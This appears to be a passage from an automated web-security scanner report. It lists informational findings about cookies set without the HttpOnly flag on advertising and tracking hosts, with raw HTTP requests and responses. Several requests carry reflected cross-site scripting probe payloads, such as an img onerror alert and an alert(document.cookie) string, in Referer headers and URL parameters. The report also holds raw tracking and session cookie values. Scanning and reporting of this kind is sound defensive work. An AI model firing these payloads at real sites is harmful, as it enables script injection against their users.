R!#]%`!!!!#<lRYE!#]Ky!!!!#<gj@R!#^0$!!!!'<lQj,!#^0%!!!!'<lQj,!#^d6!!!!#<lRYE!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aCq!!!!#<lEa2!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b.n!!!!#<lR(Q!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!(<lQj,!#fBk!!!!(<lQj,!#fBm!!!!(<lQj,!#fBn!!!!(<lQj,!#fBu!!!!#<gj@R!#fE=!!!!'<lQj,!#fG+!!!!(<lQj,!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!'<lQj,!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#mP5!!!!#<lEa6!#mP6!!!!#<lEa6!#ndJ!!!!$<lP]'!#ndP!!!!$<lP]'!#nda!!!!$<lP]'!#ne$!!!!$<lP]'!#p]T!!!!$<kL2n!#sx#!!!!#<lQj5"

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:03:59 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: bh="b!!!$N!!$ha!!DPb<lQiA!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!*10!!!!$<lQj,!!,D(!!!!%<lQj,!!-?2!!!!)<lQj,!!-G2!!!!#<lEa6!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!(<lQj,!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!$<lP]!!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!'<lQj,!!4<u!!!!(<lQj,!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!<@x!!!!#<lS<(!!?VS!!DPb<lQiA!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!MZU!!!!#<lQiC!!Mr(!!ErC<k0fB!!ObA!!!!#<lQj,!!ObV!!!!#<lQj,!!OgU!!!!'<lQj,!!Z-E!!!!#<lQj,!!Z-G!!!!#<lQj,!!Z-L!!!!#<lQj,!!Zw`!!!!$<lQj,!!Zwb!!!!%<lQj,!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!hqJ!!!!#<lP]!!!i0,!!!!#<lQj,!!iEC!!!!%<lQj,!!iEb!!!!(<lQj,!!i_9!!!!#<lQj,!!mDJ!!!!#<lQq8!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!qu+!!!!#<lP]!!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!u[u!!!!$<lS@,!!utd!!!!$<lS@,!!uto!!!!#<lS@,!!uu)!!!!#<lS<(!!v:e!!!!'<lQj,!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###G!!!!#<lP[k!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#*Xc!!!!#<lR(Q!#+]S!!!!'<lQj,!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/:a!!!!#<lP]'!#/G2!!!!#<lQj,!#/G<!!!!#<lQj,!#/GO!!!!#<lQj,!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#17@!!DPb<lQiA!#1=E!!!!#<kI4S!#2+>!!!!'<lS0M!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!$<lR(Q!#3pv!!!!$<lP]%!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!)<lQj,!#8.'!!!!#<lP]%!#8:i!!!!#<jc#c!#8?7!!!!#<lP]!!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#F1H!!!!'<lS0M!#I=D!!!!#<kjhR!#Ic1!!!!#<lP]#!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!)<lQj5!#MTF!!!!)<lQj5!#MTH!!!!)<lQj5!#MTI!!!!)<lQj5!#MTJ!!!!)<lQj5!#NjS!!!!#<lI#*!#O>M!!DPb<lQiA!#OAV!!DPb<lQiA!#OAW!!DPb<lQiA!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PqQ!!!!#<lI#)!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!'<lQj,!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#T,d!!!!#<lR(Q!#TlE!!!!#<lP](!#TnE!!!!%<lQj5!#Tnp!!!!#<lP]#!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!)<lQj5!#UL(!!!!%<lQW%!#W^8!!!!#<jem(!#Wb2!!DPb<lQiA!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!)<lQj,!#Zmf!!!!$<kT`F!#[25!!!!$<lQpR!#[L>!!!!#<lEa3!#]!g!!!!#<gj@R!#]%`!!!!#<lRYE!#]Ky!!!!#<gj@R!#^0$!!!!'<lQj,!#^0%!!!!'<lQj,!#^d6!!!!#<lRYE!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aCq!!!!#<lEa2!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b.n!!!!#<lR(Q!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!(<lQj,!#fBk!!!!(<lQj,!#fBm!!!!(<lQj,!#fBn!!!!(<lQj,!#fBu!!!!#<gj@R!#fE=!!!!'<lQj,!#fG+!!!!(<lQj,!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!'<lQj,!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#mP5!!!!#<lEa6!#mP6!!!!#<lEa6!#ndJ!!!!$<lP]'!#ndP!!!!$<lP]'!#nda!!!!$<lP]'!#ne$!!!!$<lP]'!#p]T!!!!$<kL2n!#sx#!!!!#<lQj5"; path=/; expires=Sat, 02-Feb-2013 19:03:59 GMT
Cache-Control: no-store
Last-Modified: Thu, 03 Feb 2011 19:03:59 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

13.116. http://ads.adap.tv/beacons  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /beacons

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beacons?callback=jsonp1296766389465 HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+06%3A17%3A46"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+12%3A52%3A27";Path=/;Domain=.adap.tv;Expires=Sun, 12-Oct-42 22:39:07 GMT
Content-Type: text/plain; charset=iso-8859-1
Server: Jetty(6.1.22)
Content-Length: 129

jsonp1296766389465({
   "beacons":["http://tags.bluekai.com/site/2174", "http://pixel.quantserve.com/pixel/p-c9d_b-0iR8pjg.gif"]
})

13.117. http://ads.adap.tv/cookie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /cookie

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cookie?pageUrl=http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22&isTop=true&callback=1 HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+06%3A17%3A46"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+12%3A52%3A27";Path=/;Domain=.adap.tv;Expires=Sun, 12-Oct-42 22:39:07 GMT
Content-Type: text/html
p3p: CP="DEM"
Cache-Control: no-cache
Set-Cookie: adaptv_page_url=M3h9qeyoFhilJJ6HSKW-IrkDsepsOZX1ZbNqoLiwLEpFg8DJDPXRuAgEji6xFyYXq9/YwMsMxEJwIHMl2kJGzasr-boedlgt4/5b-MdL03du1R4faxxhrUosCpAVcVHUBhwLgCAYpolwmThyvB-Kl6NyVnacX8MAy5Ei1K8-2rvbP6l79MS9wQrKqrqJJstb-ubb1GbnZGWUNHSxEL8hrkLiOhBZgvgJvtFuGhN-TrhFyZQW2bDuVQ__;Path=/;Domain=.adap.tv
Content-Length: 0
Server: Jetty(6.1.22)


13.118. http://ads.adap.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+13%3A39%3A06"

Response

HTTP/1.1 404 Not Found
Cache-Control: must-revalidate,no-cache,no-store
Set-Cookie: adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+17%3A50%3A36";Path=/;Domain=.adap.tv;Expires=Mon, 13-Oct-42 03:37:16 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1376
Server: Jetty(6.1.22)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 NOT_FOUND</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /favicon.ico. Reas
...[SNIP]...

13.119. http://ads.cpxadroit.com/adserver/5JK3H6H2EC5.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cpxadroit.com
Path:   /adserver/5JK3H6H2EC5.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/5JK3H6H2EC5.gif HTTP/1.1
Host: ads.cpxadroit.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://ad.yieldmanager.com/pixel?id=840761&t=2
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: CPX=IG=1&VID=f26bf875-1e71-47bc-bb0c-d4318eda5f45&LS=4THSXRLBJGTIB; expires=Fri, 03-Feb-2012 19:04:15 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 03 Feb 2011 19:04:14 GMT
Content-Length: 167

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://ad.yieldmanager.com/pixel?id=840761&amp;t=2">here</a>.</h2>
</body></html>

13.120. http://ads.owasp.org/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.owasp.org
Path:   /www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=73&campaignid=59&zoneid=4&loc=http%3A%2F%2Fwww.owasp.org%2Findex.php%2FTop_10_2010-A2&cb=d5eb6775cc HTTP/1.1
Accept: */*
Referer: http://www.owasp.org/index.php/Top_10_2010-A2
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ads.owasp.org
Proxy-Connection: Keep-Alive
Cookie: __utmc=77342603; __utma=77342603.1072302748.1296759700.1296759700.1296784105.2; __utmz=77342603.1296759700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=77342603.1.10.1296784105; OAID=a3c69399932b76eb3d48a5dd00eb1661

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:49:46 GMT
Server: Apache/2.2.14 (Fedora)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a3c69399932b76eb3d48a5dd00eb1661; expires=Sat, 04-Feb-2012 02:49:46 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.121. http://ads.veoh.com/openx/www/delivery/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.veoh.com
Path:   /openx/www/delivery/ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /openx/www/delivery/ajs.php?zoneid=15&test=false&cb=17332097841&charset=UTF-8&loc=http%3A//www.veoh.com/browse/videos/category/action_adventure2e455%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Ecd67645eb41/watch/v18978294NGnK88j8/x22&referer=http%3A//burp/show/11 HTTP/1.1
Host: ads.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmb=91933981.0.10.1296766388; __utmc=91933981; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:52:26 GMT
Server: Apache/1.3.39 (Unix) PHP/5.2.4
X-Powered-By: PHP/5.2.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: OAID=03e515305a005825e5530b2f5ad05cf3; expires=Fri, 03-Feb-2012 20:52:26 GMT; path=/
P3P: CP="CUR ADM OUR NOR STA NID"
Content-Type: text/javascript; charset=UTF-8
Content-Length: 52

var OX_a07f820a = '';

document.write(OX_a07f820a);

13.122. http://advertising.superpages.com/img/img-spportal/banners/smallverisign.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.superpages.com
Path:   /img/img-spportal/banners/smallverisign.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/img-spportal/banners/smallverisign.jpg HTTP/1.1
Host: advertising.superpages.com
Proxy-Connection: keep-alive
Referer: http://ir.supermedia.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; web=; shopping=; yp=; s_lastvisit=1296754109045; s_cc=true; s.campaign=comlocal1a; s_sq=%5B%5BB%5D%5D; s_ppv=100; __unam=c5114f2-12dec4b1cc4-7f15d273-3

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:09:47 GMT
Content-length: 8275
Content-type: image/jpeg
Etag: "49a18ecc-1-0-2053"
Last-modified: Thu, 06 Jan 2011 16:21:20 GMT
Accept-ranges: bytes
Set-Cookie: NSC_bewfsujtjoh-tvqfsqbhft-dpn-80=ffffffff9482139e45525d5f4f58455e445a4a423660;expires=Fri, 04-Feb-2011 19:09:42 GMT;path=/

......JFIF.....H.H.....FExif..MM.*.............................b...........j.(...........1.........r.2.........~.i.................H.......H....GIMP 2.4.5..2009:02:12 10:54:48.........................
...[SNIP]...

13.123. http://affiliates.digitalriver.com/42/112156/287  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliates.digitalriver.com
Path:   /42/112156/287

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /42/112156/287 HTTP/1.1
Host: affiliates.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 03 Feb 2011 20:50:41 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_vtc=705d4437bc1ddc78ad87167fab6cd7d7; expires=Sat, 05-Mar-2011 20:50:41 GMT; path=/
Location: http://img.directtrack.com/digitalriver/287.gif
X-Server-Name: www@dc1dtweb128
Content-Length: 0
Content-Type: text/html


13.124. http://app.insightgrit.com/Visit37.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://app.insightgrit.com
Path:   /Visit37.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Visit37.php?vt=V&id=94375989827&ref=http://ir.supermedia.com/&z=77201&purl=http://www.supermedia.com/support/contact-us/ HTTP/1.1
Host: app.insightgrit.com
Proxy-Connection: keep-alive
Referer: http://www.supermedia.com/support/contact-us/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=f52e78d070ddf6bd56f62f3cfbcdfbf2; IG94375=f52e78d070ddf6bd56f62f3cfbcdfbf2

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:09 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:09 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: IG94375=f52e78d070ddf6bd56f62f3cfbcdfbf2; expires=Mon, 04-Apr-2011 19:09:09 GMT; domain=app.insightgrit.com
p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT"
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.125. http://app.scanscout.com/ssframework/adStreamJSController.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://app.scanscout.com
Path:   /ssframework/adStreamJSController.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ssframework/adStreamJSController.htm?a=getadscheduleforcontent&format=vast&fetchads=preroll&ss_partnerId=626&ss_mediaId=v18978294NGnK88j8&ss_mediaTitle=MagadheeraSmartDesis.TK.mp4&ss_mediaCategories=&ss_mediaKeywords=&ss_mediaURL=videodetails&ss_pageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_maxPrerollDuration=30&ss_width=480&ss_height=360&ss_asVersion=3&ss_mediaDescription=&ss_streamPageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_acceptNonvideo=Y&jsa=Y HTTP/1.1
Host: app.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:07:34 GMT
Server: Apache
p3p: policyref=/w3c/p3p.xml
Set-Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; Domain=.scanscout.com; Expires=Sun, 31-Jan-2021 21:07:34 GMT; Path=/
